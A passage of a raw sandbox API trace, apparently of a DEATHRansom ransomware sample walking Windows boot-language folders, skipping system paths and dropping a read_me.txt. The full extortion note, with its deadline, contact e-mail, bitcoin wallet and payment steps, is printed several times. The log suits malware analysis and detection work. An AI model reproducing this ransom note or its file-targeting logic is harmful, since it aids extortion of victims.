ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0073.583] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ") returned 17 [0073.583] lstrcmpW (lpString1="cs-CZ", lpString2="..") returned 1 [0073.583] lstrcmpW (lpString1="cs-CZ", lpString2=".") returned 1 [0073.583] StrStrW (lpFirst="cs-cz", lpSrch="programdata") returned 0x0 [0073.583] StrStrW (lpFirst="cs-cz", lpSrch="$recycle.bin") returned 0x0 [0073.583] StrStrW (lpFirst="cs-cz", lpSrch="program files") returned 0x0 [0073.583] StrStrW (lpFirst="cs-cz", lpSrch="windows") returned 0x0 [0073.583] StrStrW (lpFirst="cs-cz", lpSrch="all users") returned 0x0 [0073.583] StrStrW (lpFirst="cs-cz", lpSrch="appdata") returned 0x0 [0073.583] GetProcessHeap () returned 0x280000 [0073.583] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a20070 [0073.584] lstrcpyW (in: lpString1=0x8a20070, lpString2="\\\\?\\C:\\Boot\\cs-CZ" | out: lpString1="\\\\?\\C:\\Boot\\cs-CZ") returned="\\\\?\\C:\\Boot\\cs-CZ" [0073.584] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 2 [0073.584] QueueUserWorkItem (Function=0x40a710, Context=0x8a20070, Flags=0x0) returned 1 [0073.584] GetProcessHeap () returned 0x280000 [0073.584] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a30078 [0073.585] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\*") returned 19 [0073.585] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2638 [0073.586] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\.") returned 19 [0073.586] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.586] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.586] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.586] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\..") returned 20 [0073.586] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.586] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.586] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 33 [0073.586] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0073.586] FindClose (in: hFindFile=0x2b2638 | out: hFindFile=0x2b2638) returned 1 [0073.586] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\read_me.txt") returned 29 [0073.587] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\read_me.txt" (normalized: "c:\\boot\\cs-cz\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a4 [0073.587] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.587] WriteFile (in: hFile=0x7a4, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e35c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e35c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.588] CloseHandle (hObject=0x7a4) returned 1 [0073.589] GetProcessHeap () returned 0x280000 [0073.589] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a30078 | out: hHeap=0x280000) returned 1 [0073.590] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="da-DK", cAlternateFileName="")) returned 1 [0073.590] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK") returned 17 [0073.590] lstrcmpW (lpString1="da-DK", lpString2="..") returned 1 [0073.590] lstrcmpW (lpString1="da-DK", lpString2=".") returned 1 [0073.590] StrStrW (lpFirst="da-dk", lpSrch="programdata") returned 0x0 [0073.590] StrStrW (lpFirst="da-dk", lpSrch="$recycle.bin") returned 0x0 [0073.590] StrStrW (lpFirst="da-dk", lpSrch="program files") returned 0x0 [0073.590] StrStrW (lpFirst="da-dk", lpSrch="windows") returned 0x0 [0073.590] StrStrW (lpFirst="da-dk", lpSrch="all users") returned 0x0 [0073.590] StrStrW (lpFirst="da-dk", lpSrch="appdata") returned 0x0 [0073.590] GetProcessHeap () returned 0x280000 [0073.590] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a30078 [0073.590] lstrcpyW (in: lpString1=0x8a30078, lpString2="\\\\?\\C:\\Boot\\da-DK" | out: lpString1="\\\\?\\C:\\Boot\\da-DK") returned="\\\\?\\C:\\Boot\\da-DK" [0073.590] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 3 [0073.590] QueueUserWorkItem (Function=0x40a710, Context=0x8a30078, Flags=0x0) returned 1 [0073.590] GetProcessHeap () returned 0x280000 [0073.590] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a40080 [0073.591] wnsprintfW (in: pszDest=0x8a40080, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\*") returned 19 [0073.591] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\da-DK\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2638 [0073.591] wnsprintfW (in: pszDest=0x8a40080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\.") returned 19 [0073.591] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.591] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.591] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.591] wnsprintfW (in: pszDest=0x8a40080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\..") returned 20 [0073.591] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.591] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.592] wnsprintfW (in: pszDest=0x8a40080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 33 [0073.592] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0073.592] FindClose (in: hFindFile=0x2b2638 | out: hFindFile=0x2b2638) returned 1 [0073.592] wnsprintfW (in: pszDest=0x8a40080, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\read_me.txt") returned 29 [0073.592] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\read_me.txt" (normalized: "c:\\boot\\da-dk\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a4 [0073.592] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.592] WriteFile (in: hFile=0x7a4, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e35c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e35c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.593] CloseHandle (hObject=0x7a4) returned 1 [0073.593] GetProcessHeap () returned 0x280000 [0073.593] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a40080 | out: hHeap=0x280000) returned 1 [0073.593] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="de-DE", cAlternateFileName="")) returned 1 [0073.593] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE") returned 17 [0073.593] lstrcmpW (lpString1="de-DE", lpString2="..") returned 1 [0073.593] lstrcmpW (lpString1="de-DE", lpString2=".") returned 1 [0073.593] StrStrW (lpFirst="de-de", lpSrch="programdata") returned 0x0 [0073.593] StrStrW (lpFirst="de-de", lpSrch="$recycle.bin") returned 0x0 [0073.593] StrStrW (lpFirst="de-de", lpSrch="program files") returned 0x0 [0073.593] StrStrW (lpFirst="de-de", lpSrch="windows") returned 0x0 [0073.593] StrStrW (lpFirst="de-de", lpSrch="all users") returned 0x0 [0073.594] StrStrW (lpFirst="de-de", lpSrch="appdata") returned 0x0 [0073.594] GetProcessHeap () returned 0x280000 [0073.594] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a40080 [0073.594] lstrcpyW (in: lpString1=0x8a40080, lpString2="\\\\?\\C:\\Boot\\de-DE" | out: lpString1="\\\\?\\C:\\Boot\\de-DE") returned="\\\\?\\C:\\Boot\\de-DE" [0073.594] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 4 [0073.594] QueueUserWorkItem (Function=0x40a710, Context=0x8a40080, Flags=0x0) returned 1 [0073.594] GetProcessHeap () returned 0x280000 [0073.594] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a50088 [0073.595] wnsprintfW (in: pszDest=0x8a50088, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\*") returned 19 [0073.595] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\de-DE\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2678 [0073.607] wnsprintfW (in: pszDest=0x8a50088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\.") returned 19 [0073.607] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.607] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.607] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.607] wnsprintfW (in: pszDest=0x8a50088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\..") returned 20 [0073.607] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.607] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.607] wnsprintfW (in: pszDest=0x8a50088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 33 [0073.607] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0073.607] FindClose (in: hFindFile=0x2b2678 | out: hFindFile=0x2b2678) returned 1 [0073.607] wnsprintfW (in: pszDest=0x8a50088, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\read_me.txt") returned 29 [0073.607] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\read_me.txt" (normalized: "c:\\boot\\de-de\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0073.608] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.608] WriteFile (in: hFile=0x7a8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e35c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e35c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.609] CloseHandle (hObject=0x7a8) returned 1 [0073.609] GetProcessHeap () returned 0x280000 [0073.609] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a50088 | out: hHeap=0x280000) returned 1 [0073.609] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="el-GR", cAlternateFileName="")) returned 1 [0073.609] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR") returned 17 [0073.609] lstrcmpW (lpString1="el-GR", lpString2="..") returned 1 [0073.609] lstrcmpW (lpString1="el-GR", lpString2=".") returned 1 [0073.609] StrStrW (lpFirst="el-gr", lpSrch="programdata") returned 0x0 [0073.609] StrStrW (lpFirst="el-gr", lpSrch="$recycle.bin") returned 0x0 [0073.609] StrStrW (lpFirst="el-gr", lpSrch="program files") returned 0x0 [0073.609] StrStrW (lpFirst="el-gr", lpSrch="windows") returned 0x0 [0073.609] StrStrW (lpFirst="el-gr", lpSrch="all users") returned 0x0 [0073.609] StrStrW (lpFirst="el-gr", lpSrch="appdata") returned 0x0 [0073.609] GetProcessHeap () returned 0x280000 [0073.609] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a50088 [0073.609] lstrcpyW (in: lpString1=0x8a50088, lpString2="\\\\?\\C:\\Boot\\el-GR" | out: lpString1="\\\\?\\C:\\Boot\\el-GR") returned="\\\\?\\C:\\Boot\\el-GR" [0073.609] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 5 [0073.609] QueueUserWorkItem (Function=0x40a710, Context=0x8a50088, Flags=0x0) returned 1 [0073.609] GetProcessHeap () returned 0x280000 [0073.609] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a20070 [0073.609] wnsprintfW (in: pszDest=0x8a20070, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\*") returned 19 [0073.610] FindFirstFileW (in: 